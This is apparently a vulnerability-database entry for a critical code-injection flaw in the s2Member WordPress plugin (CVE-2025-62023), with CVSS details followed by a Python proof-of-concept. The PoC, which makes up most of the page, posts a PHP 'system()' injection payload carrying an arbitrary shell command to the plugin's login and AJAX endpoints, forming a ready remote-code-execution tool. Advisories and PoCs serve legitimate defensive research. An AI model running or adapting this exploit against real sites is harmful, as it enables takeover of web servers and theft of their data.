Improper Control of Generation of Code ('Code Injection') vulnerability in Cristián Lávaque s2Member s2member.This issue affects s2Member: from n/a through <= 250905.
CVSS Details
CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
s2Member Plugin <= 250905 (所有版本)
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
# CVE-2025-62023 PoC - s2Member Code Injection
# Target: WordPress site with s2Member plugin <= 250905
def exploit(target_url, cmd):
"""
Exploit for CVE-2025-62023: s2Member Code Injection
This PoC demonstrates remote code execution via improper input validation
"""
target = target_url.rstrip('/')
# Injection point in s2Member plugin
# The plugin fails to sanitize user-supplied input before code generation
payload = f"'; system('{cmd}'); //"
# Target endpoint - s2Member handles various AJAX and API calls
endpoints = [
f"{target}/wp-admin/admin-ajax.php",
f"{target}/?s2member_pro_login_widget=1",
f"{target}/?s2member_pro_shortcode=1"
]
for endpoint in endpoints:
try:
params = {
'action': 's2member_pro_login',
's2member_pro_login_user_login': payload,
's2member_pro_login_user_pass': 'test'
}
response = requests.post(endpoint, data=params, timeout=10, verify=False)
if response.status_code == 200:
print(f"[*] Request sent to {endpoint}")
print(f"[*] Response length: {len(response.text)}")
return True
except requests.RequestException as e:
print(f"[!] Error targeting {endpoint}: {e}")
return False
if __name__ == "__main__":
if len(sys.argv) < 3:
print(f"Usage: python {sys.argv[0]} <target_url> <command>")
print(f"Example: python {sys.argv[0]} http://example.com 'id'")
sys.exit(1)
target_url = sys.argv[1]
command = sys.argv[2]
print(f"[*] Exploiting CVE-2025-62023 on {target_url}")
print(f"[*] Executing command: {command}")
exploit(target_url, command)